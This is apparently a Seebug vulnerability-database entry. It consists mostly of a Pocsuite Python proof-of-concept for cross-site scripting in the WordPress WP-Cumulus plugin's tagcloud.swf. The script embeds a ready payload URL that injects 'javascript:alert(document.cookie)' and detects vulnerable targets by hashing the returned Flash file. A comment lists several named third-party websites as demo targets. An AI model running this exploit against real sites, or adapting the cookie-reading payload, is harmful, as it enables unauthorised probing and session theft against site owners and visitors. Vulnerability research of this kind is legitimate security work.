WordPress WP-Cumulus Plugin 1.x 'tagcloud.swf' Cross-Site Scripting Vulnerability

2014-07-01T00:00:00
ID SSV:86593
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding=utf-8

import md5
import urllib2
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

'''
位置:
/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Demos:
http://www.ackb.ru
http://arroyoculebro.com
http://billedguiden.dk/
http://www.wizzer.cn

'''


class TestPOC(POCBase):
    vulID = '86593'  # ssvid
    version = '1.0'
    author = ['ct0p5']
    vulDate = '2009-12-02'
    createDate = '2016-04-25'
    updateDate = '2016-04-25'
    references = ['http://www.seebug.org/vuldb/ssvid-86593']
    name = 'WordPress WP-Cumulus Plugin 1.x 'tagcloud.swf' Cross-Site Scripting Vulnerability'
    appPowerLink = ''
    appName = ''
    appVersion = ''
    vulType = 'Other'
    desc = '''
    '''
    samples = ['']
    install_requires = ['']
    #请尽量不要使用第三方库,必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段


    def _verify(self):
        flash_md5 = ["2eca33d885ce4b885a5213b24e1b43f0","8e09cedd90c98ce4ba681b5fcdd53d71","fcd4b1ac66035572d1c76d474aa0d9ec"]
        file_path = "/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E"
        verify_url = self.url + file_path
        output = Output(self)
        result = {}
        request = urllib2.Request(verify_url)
        response = urllib2.urlopen(request)
        content = response.read()
        md5_value = md5.new(content).hexdigest()
        print md5_value
        if md5_value in flash_md5:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_url
            output.success(result)
        else: 
            output.fail('No vulnerability found')
        return output

    def _attack(self): 
        return self._verify()

register(TestPOC)